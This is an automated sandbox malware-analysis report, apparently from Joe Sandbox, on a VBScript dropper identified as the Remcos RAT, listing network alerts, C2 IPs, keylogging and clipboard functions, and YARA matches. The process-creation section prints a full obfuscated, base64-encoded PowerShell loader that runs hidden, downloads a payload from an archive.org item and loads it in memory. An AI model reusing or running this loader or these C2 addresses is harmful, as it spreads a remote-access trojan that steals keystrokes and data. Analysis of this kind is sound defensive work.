                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60898 -> 45.90.89.98:8243
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60899 -> 45.90.89.98:8243
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49713 -> 45.90.89.98:8243
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60900 -> 45.90.89.98:8243
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 45.90.89.123:80 -> 192.168.2.10:49707
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 45.90.89.123:80 -> 192.168.2.10:49707
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60901 -> 45.90.89.98:8243
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 45.90.89.98
                  Source: global trafficTCP traffic: 192.168.2.10:49708 -> 45.90.89.98:8243
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2117/RMCCF.txt HTTP/1.1Host: 45.90.89.123Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 45.90.89.98 45.90.89.98
                  Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00426D42 recv,11_2_00426D42
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2117/RMCCF.txt HTTP/1.1Host: 45.90.89.123Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DC4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DC4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123/2117/RMCCF.txt
                  Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000008.00000002.1454522210.000001EB02CCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000008.00000002.1454522210.000001EB02CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1454522210.000001EB02C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2E87A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt9uO;FIibase64Content
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.10:49706 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000011_2_0040A2F3
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0040A41B
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CA73 SystemParametersInfoW,11_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004167EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043706A11_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041400511_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E11C11_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004541D911_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004381E811_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041F18B11_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044627011_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E34B11_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004533AB11_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042742E11_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043756611_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E5A811_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004387F011_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043797E11_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004339D711_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DA4911_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427AD711_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041DBF311_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427C4011_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00437DB311_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00435EEB11_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043DEED11_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00426E9F11_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: 5fKvwnCAeC.vbsInitial sample: Strings found which are bigger than 50
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
